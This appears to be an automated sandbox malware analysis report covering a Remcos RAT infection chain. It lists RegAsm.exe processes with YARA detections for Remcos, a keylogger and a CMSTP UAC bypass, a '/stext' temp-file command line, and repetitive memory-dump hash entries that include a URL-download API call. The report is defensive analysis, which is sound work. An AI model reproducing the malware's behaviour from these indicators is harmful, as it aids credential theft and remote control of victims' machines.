                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:10:04:56
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                Imagebase:0x4c0000
                                                                                File size:65'440 bytes
                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4545370630.00000000026AE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4543306554.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:13
                                                                                Start time:10:05:21
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva"
                                                                                Imagebase:0x670000
                                                                                File size:65'440 bytes
                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:14
                                                                                Start time:10:05:21
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                                                                                Imagebase:0x190000
                                                                                File size:65'440 bytes
                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:15
                                                                                Start time:10:05:21
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                                                                                Imagebase:0x190000
                                                                                File size:65'440 bytes
                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:16
                                                                                Start time:10:05:21
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                                                                                Imagebase:0xd50000
                                                                                File size:65'440 bytes
                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:10:05:21
                                                                                Start date:17/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv"
                                                                                Imagebase:0xc30000
                                                                                File size:65'440 bytes
                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Reset < >
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.2099634017.0000000006850000.00000010.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_6850000_mshta.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                  • Instruction ID: 3bd5a0fed3f8c7466263bad4888f5dd2a63fe84dca186c46926cfcb45eaef39d
                                                                                  • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.2099634017.0000000006850000.00000010.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_6850000_mshta.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                  • Instruction ID: 3bd5a0fed3f8c7466263bad4888f5dd2a63fe84dca186c46926cfcb45eaef39d
                                                                                  • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.2099634017.0000000006850000.00000010.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_6850000_mshta.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                  • Instruction ID: 3bd5a0fed3f8c7466263bad4888f5dd2a63fe84dca186c46926cfcb45eaef39d
                                                                                  • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2237054181.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_45d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c86fa3977cf32dd38d6313fd8bfdbbe1eabd641e562bace92ace0f7ef5c87cc
                                                                                  • Instruction ID: b097a235963f6046082b99e740be46ec955ab892b1534b96a1d487646be8885c
                                                                                  • Opcode Fuzzy Hash: 7c86fa3977cf32dd38d6313fd8bfdbbe1eabd641e562bace92ace0f7ef5c87cc
                                                                                  • Instruction Fuzzy Hash: 5D222974A00209EFCB15CF9CD984A9EBBB2FF89310F248559E805AB365D735ED81DB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2247403398.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7580000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tP]q$tP]q
                                                                                  • API String ID: 0-145478062
                                                                                  • Opcode ID: c3e8b29f45257556a0edbb0d111a0ed81ae84799c318d290012349ec4b39a6e1
                                                                                  • Instruction ID: 4aaae37a5a8ba29e8b388f437e3c6df5b50c9ed5af148516dd002ce2eca36f71
                                                                                  • Opcode Fuzzy Hash: c3e8b29f45257556a0edbb0d111a0ed81ae84799c318d290012349ec4b39a6e1
                                                                                  • Instruction Fuzzy Hash: 82F1E6B07006099FCB14AF6DD550AAABBE6FFC4710F24885EE846AB350DE71DC46CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2247403398.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7580000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tP]q$tP]q
                                                                                  • API String ID: 0-145478062
                                                                                  • Opcode ID: 36ca0dc433e37e318f28a0f60c08b2d7253777f3b59fb3d15db5aa99e835324f
                                                                                  • Instruction ID: 8bf5abd1a43140a020ecc6b5565b0638b49eca571d386aa88f47a5c7916f8eb4
                                                                                  • Opcode Fuzzy Hash: 36ca0dc433e37e318f28a0f60c08b2d7253777f3b59fb3d15db5aa99e835324f
                                                                                  • Instruction Fuzzy Hash: 5F5145B1700354AFC7106B68991076ABBE6FFC5B10F14885AE989EF291CA71DC49C3A1
                                                                                  APIs
                                                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 045D51A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2237054181.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_45d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: DownloadFile
                                                                                  • String ID:
                                                                                  • API String ID: 1407266417-0
                                                                                  • Opcode ID: 50d8118f59fa4cc3a9c3233022e2df8f65ae099b897fe8f801f27292b36c74e8
                                                                                  • Instruction ID: f086ee76f23f92de216e2d0efd0a30c27b9b99e06a11f19d5b715db10d7ec800
                                                                                  • Opcode Fuzzy Hash: 50d8118f59fa4cc3a9c3233022e2df8f65ae099b897fe8f801f27292b36c74e8
                                                                                  • Instruction Fuzzy Hash: 0F21F6B5D01259EFCB10CF99D984ADEFBB4FF48310F14811AE918A7210D374A954CFA1
                                                                                  APIs
                                                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 045D51A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2237054181.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_45d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: DownloadFile
                                                                                  • String ID:
                                                                                  • API String ID: 1407266417-0
                                                                                  • Opcode ID: e34c81afa572980e6b89b2635638192743a310fa607370c64034630d71b68e94
                                                                                  • Instruction ID: c450aa1f36537b219f3f43429089bf0746e6ec9395ff231ba1c5733c3d97dab3
                                                                                  • Opcode Fuzzy Hash: e34c81afa572980e6b89b2635638192743a310fa607370c64034630d71b68e94
                                                                                  • Instruction Fuzzy Hash: 65F0F6B2C0A284AED7129BAC9824798BFA4FF67314F0540C7D198DB452F239551DD7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2247403398.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7580000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tP]q
                                                                                  • API String ID: 0-2175968468
                                                                                  • Opcode ID: f5e38396a82ee849850e3e99acf1bc7d280a0154cb24efe39894db355b0ba05a
                                                                                  • Instruction ID: 71bc636197e17d571f29175b27aecf0f28ab78408c2f876b93b24dcf42715ace
                                                                                  • Opcode Fuzzy Hash: f5e38396a82ee849850e3e99acf1bc7d280a0154cb24efe39894db355b0ba05a
                                                                                  • Instruction Fuzzy Hash: BF91A4B0A10609DFCB54EF58C580BA9B7F2FB84710F19855EE856AB390DB71DC42CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2236451883.000000000456D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0456D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_456d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 994777fdaf624d3bd967c0f4470f2e6b6d58e6512129d4b0bd4289aa36026f91
                                                                                  • Instruction ID: 8b0b3ae3b9660bd292e13bba81b5ab436401270d87edf9a244885849ee7243f4
                                                                                  • Opcode Fuzzy Hash: 994777fdaf624d3bd967c0f4470f2e6b6d58e6512129d4b0bd4289aa36026f91
                                                                                  • Instruction Fuzzy Hash: 4B01FC7120434099D7208E15E984B67BFACFF85330F18CD15ED490B146E279A449D6B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2236451883.000000000456D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0456D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_456d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ff7c453a317c76541dd2db29c81b8e4e3fa5b13863ef665abd37a465b1f60525
                                                                                  • Instruction ID: 4f0ec782048258b09e557a44da4d06dbad67dbea9f346d246db8e51d512da019
                                                                                  • Opcode Fuzzy Hash: ff7c453a317c76541dd2db29c81b8e4e3fa5b13863ef665abd37a465b1f60525
                                                                                  • Instruction Fuzzy Hash: B4015E7110E3C09ED7128B259C94B52BFB8EF47224F1D85DBD9888F2A3D2695849C7B2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2247403398.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7580000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$X=Jl$$]q$$]q
                                                                                  • API String ID: 0-1729112259
                                                                                  • Opcode ID: 5147076d0e41a432c1f4ce19ce9773893e67cc4d77e5a50a859b0adbe30d47a2
                                                                                  • Instruction ID: 29e08021039b437529c2822106d70dd126d098c1674007fd02da72647b450d2a
                                                                                  • Opcode Fuzzy Hash: 5147076d0e41a432c1f4ce19ce9773893e67cc4d77e5a50a859b0adbe30d47a2
                                                                                  • Instruction Fuzzy Hash: 6E5148B17053068FCBA5AF68C4507EAFBF5BF82210F148867C449EB295DB35D84AC791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2247403398.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7580000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                  • API String ID: 0-978391646
                                                                                  • Opcode ID: 8638728f6a89b05f463bc37e906e02cb74e1e86bcab79489c49d37b2cfce7d74
                                                                                  • Instruction ID: b940fa0df358a1868cfc8c0cbab515dae70dafe723673a2f2f1e96af9a150e62
                                                                                  • Opcode Fuzzy Hash: 8638728f6a89b05f463bc37e906e02cb74e1e86bcab79489c49d37b2cfce7d74
                                                                                  • Instruction Fuzzy Hash: 5A01BC6124D3D58FC72B12391C201A62FBAAFC391076A49DBC4D4EF2E7C9694C49C3A3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2132140670.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7bb0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$4']q
                                                                                  • API String ID: 0-1785108022
                                                                                  • Opcode ID: 1ba2c6216ad42cf80dda871fd75943bc638057e6d170ad8a72a8cc442dabbf33
                                                                                  • Instruction ID: 59539d01e84b904138899e5cf36860b4e21c6f600a4ddfe7373f1b73e95265e4
                                                                                  • Opcode Fuzzy Hash: 1ba2c6216ad42cf80dda871fd75943bc638057e6d170ad8a72a8cc442dabbf33
                                                                                  • Instruction Fuzzy Hash: FB1226F17043498FDB258A6C88207FABBE6EFC2610F5484AAD905CF295DBB1C941C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2127071372.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_34e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \o^$\o^$\o^
                                                                                  • API String ID: 0-1087896698
                                                                                  • Opcode ID: f10ad676692da4691df54b6a68abe4931ca3a780a5ed119b9e702dc7cb859afb
                                                                                  • Instruction ID: 9772b198e9fccde084091744effa5fdbb03f800d85cec3d895ec4514a2f4a1a7
                                                                                  • Opcode Fuzzy Hash: f10ad676692da4691df54b6a68abe4931ca3a780a5ed119b9e702dc7cb859afb
                                                                                  • Instruction Fuzzy Hash: 4B41A3B1A092958FC702CB6DD494599BFB0FF56340F0A40EBD495DB393D725AC0ACB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2127071372.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_34e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 283ee30f15355c17dee639471a44f081eb5856c85e8b89136e8717acd2c2a6d0
                                                                                  • Instruction ID: 976efdc52c1b18ac5e3e1c185495a4aa78a752f9798c2978f68448f909223081
                                                                                  • Opcode Fuzzy Hash: 283ee30f15355c17dee639471a44f081eb5856c85e8b89136e8717acd2c2a6d0
                                                                                  • Instruction Fuzzy Hash: 5791AD70A002058FCB05DF5CC5949AEFBB6FF48310B298A9AD815AB365C736EC81CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2132140670.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7bb0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2083b0431864f06d09648dcdd587dc96271ddbae8454e47ec8caf8e0c3f17e67
                                                                                  • Instruction ID: 255c91280f937c205a9ea6c6a68873dc9dab281ad1273cd1a1f9096dc4e90d19
                                                                                  • Opcode Fuzzy Hash: 2083b0431864f06d09648dcdd587dc96271ddbae8454e47ec8caf8e0c3f17e67
                                                                                  • Instruction Fuzzy Hash: 8441E3F0A0430E8FEB358A2D8561BBA7BE2EF86650B5880E5CD009F255D7B2D945C7A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2127071372.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_34e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5cbc6e765659c73df079b04abc16f1b996c53804eb0d57a3c2cab41b0ccdfd37
                                                                                  • Instruction ID: 24d83139a024a521fb264fdb8a75e20f2939dba8eca718323d1b59de3761eb8f
                                                                                  • Opcode Fuzzy Hash: 5cbc6e765659c73df079b04abc16f1b996c53804eb0d57a3c2cab41b0ccdfd37
                                                                                  • Instruction Fuzzy Hash: 84414974A005059FCB09CF48C5989AEFBB6FF48311B25869AC815AB364C772EC91CF94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2127071372.00000000034E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_34e0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3c119c61905abfc5f33046836294a1c7c9f92ecf05a8bcb3b60054e4f7e93847
                                                                                  • Instruction ID: 3f7091efdeb41e0d1a2437fd10550b1f6e66fc4f81170057444968f4bd84c47b
                                                                                  • Opcode Fuzzy Hash: 3c119c61905abfc5f33046836294a1c7c9f92ecf05a8bcb3b60054e4f7e93847
                                                                                  • Instruction Fuzzy Hash: ED11F3B4A002199FCB04CF99D5809AAFBB5FF89310B1585AAE809AB351C331EC41CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2126696939.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_33ed000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f15c6c3b7d6c1e7612a4419e82e150e45b3f3da328e53000bb459daf4d17f5ac
                                                                                  • Instruction ID: 072ebe0c60224460ef1d59b9d2849f259c73b4dc450642fde08cbfc5db325a5e
                                                                                  • Opcode Fuzzy Hash: f15c6c3b7d6c1e7612a4419e82e150e45b3f3da328e53000bb459daf4d17f5ac
                                                                                  • Instruction Fuzzy Hash: C701DF310043149EE720CA2ACDC4BA7BF9CEF86321F1CC46AED580B686C27D9C41CAB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2126696939.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_33ed000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4a25c580ed567a720ac4bd613f0c8eadb2db5ec49ab6d1ddb5b7de1d5da594d
                                                                                  • Instruction ID: c7afa20cba4acfc5e33e660d48042dbce638bcd2eb62e372b87172f8a05565e2
                                                                                  • Opcode Fuzzy Hash: d4a25c580ed567a720ac4bd613f0c8eadb2db5ec49ab6d1ddb5b7de1d5da594d
                                                                                  • Instruction Fuzzy Hash: D801527100E3D09ED7128B25CD94B56BFB8EF47225F1D80DBD9888F2A7C2695844C772
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2132140670.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7bb0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-108373575
                                                                                  • Opcode ID: 9c2eee3ae8a226eff230a31f6672a12b59ba310544b586acffc26ced2a4ea5f4
                                                                                  • Instruction ID: f940d1d25a950cbeecbf47a14c70eccc7574fe93f4a724162a7e96f2eed356de
                                                                                  • Opcode Fuzzy Hash: 9c2eee3ae8a226eff230a31f6672a12b59ba310544b586acffc26ced2a4ea5f4
                                                                                  • Instruction Fuzzy Hash: 02F124B1B0430D8FE7248A6C84206BABBE9EFD5620F1480BAD946CB251EB71D845C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2132140670.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7bb0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-108373575
                                                                                  • Opcode ID: e2c392418df7a01acd77a2d8d41c982f8515adf51a5dde3c9b90cc2aa1e3cda3
                                                                                  • Instruction ID: 27bfd2e6f9c4335d6582535472d07b40f6d974ec04437a4e7dc2eb56383f301d
                                                                                  • Opcode Fuzzy Hash: e2c392418df7a01acd77a2d8d41c982f8515adf51a5dde3c9b90cc2aa1e3cda3
                                                                                  • Instruction Fuzzy Hash: A4A154F17043168FE7346A6998506BBBBE9EFC5A10F1480BBDD46CB291DAB1CC41C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2132140670.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7bb0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-858218434
                                                                                  • Opcode ID: 5c742f8bddee2e683836abf7a94fdac284121f2d778e4111c20c64b9913456a6
                                                                                  • Instruction ID: e9c2f229ece448a081b5a82bd566913fb9cc027e2e8456dc94e0f7bfca007c39
                                                                                  • Opcode Fuzzy Hash: 5c742f8bddee2e683836abf7a94fdac284121f2d778e4111c20c64b9913456a6
                                                                                  • Instruction Fuzzy Hash: 0A2123F13143165BEB38592E4841BBBBADADBC1B10F20846A9D05CB381DDB6C8458360
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2132140670.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7bb0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                  • API String ID: 0-978391646
                                                                                  • Opcode ID: b11da8ad5fc615776b3d9ca19706aa9a52d54248b73d296d4b073a9b2b7987d1
                                                                                  • Instruction ID: 7214b54206d5cf550d82c8407857fce5655fbc9affdaff95be60abee746976c3
                                                                                  • Opcode Fuzzy Hash: b11da8ad5fc615776b3d9ca19706aa9a52d54248b73d296d4b073a9b2b7987d1
                                                                                  • Instruction Fuzzy Hash: E101F2A170D3868FD73B162C086027A2FB69F8695072A45E7C880CF297C9694C0983A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.2469098042.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_d9d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4c824bca9799413702f1f977b7d5ef7f5fbc2a2b9ab2036cff62a3b536eecc85
                                                                                  • Instruction ID: 02c4d433caca92b8e58cb8be5d50b22792fd89623fd2ed5d1605c28e6a10fd5d
                                                                                  • Opcode Fuzzy Hash: 4c824bca9799413702f1f977b7d5ef7f5fbc2a2b9ab2036cff62a3b536eecc85
                                                                                  • Instruction Fuzzy Hash: 4801D6714053449EEB208A29DD84B67FF9CEF46364F2CC52AED5C4B286C279D845CAB1
                                                                                  Memory Dump Source
